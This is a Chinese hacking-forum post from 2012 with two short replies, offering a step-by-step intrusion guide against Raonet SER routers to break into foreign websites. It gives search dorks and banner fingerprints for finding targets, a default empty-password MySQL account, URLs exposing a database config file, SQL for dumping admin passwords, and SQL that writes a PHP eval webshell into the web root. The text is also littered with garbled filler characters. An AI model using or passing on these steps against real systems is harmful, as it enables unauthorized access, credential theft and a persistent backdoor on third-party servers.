找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3066|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
4 Z8 \" w- e. Y; u; o: a1 D8 Z- m' a/ S4 V' e
1:google搜索'Raonet Subscriber Ethernet Router'/ y6 @: m" `, s) {

: \3 X- ]1 V* @5 J, O2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
2 M+ |- Q7 B4 i/ @
( c8 S/ Y4 H+ C% I3 R  E3 U3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
& U. i, f& T8 B# D" W8 W* p8 I5 f5 S6 O/ \' X0 @
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
" ]' E0 Q% X( [# S# J
7 ~& p) m) R/ B7 A( n. ]; x ) T4 T- N1 o3 K. y

; c" f0 I( w9 |* f入侵步骤:" D3 }0 \! ]3 p# W, I3 m% U

9 W. |' N  G4 U8 |: w' ]1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php3 k, v( d& a* Z. N" W4 v
- A8 G4 c. u$ M3 @9 ]1 _
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc% [3 x/ Z+ v* a
3:得到密码后连接,查看GUI管理密码:
  I9 X0 Q0 X; N- h6 U" ~use ser_500% z0 J! i- t# _: g' [4 j% t/ s# X. h4 s
select id,passwd from user;; y0 T9 c, ?3 m- X6 w
4:通过数据库写入webshell,执行命令:9 m! y' \( {; C2 p. G7 ^  Q- ?
use mysql;' S- f; D  c! |0 Q; \
create table ok(cmd TEXT);
8 o2 k: ^4 l3 D4 {4 G# T1 C7 p7 o6 k2 }insert into ok values("<?php @eval($_POST[cmd])?>");, b! c. |  ?5 \; W& S
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";4 W1 l/ n; z, o2 |. U6 s7 W! m
drop table ok;* Z4 g! t6 @" z" ]2 ]

8 A. l/ }6 K6 L! M  D! g; K5:连接后门shell.php
/ b  l+ R7 W, ^1 {6 H3 u
; A) r/ s4 L/ c1 P7 L6. 搞定!
+ ~" U& g7 t& b  z: |( U8 e( \' e; `2 o/ z* w; m, K( f
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表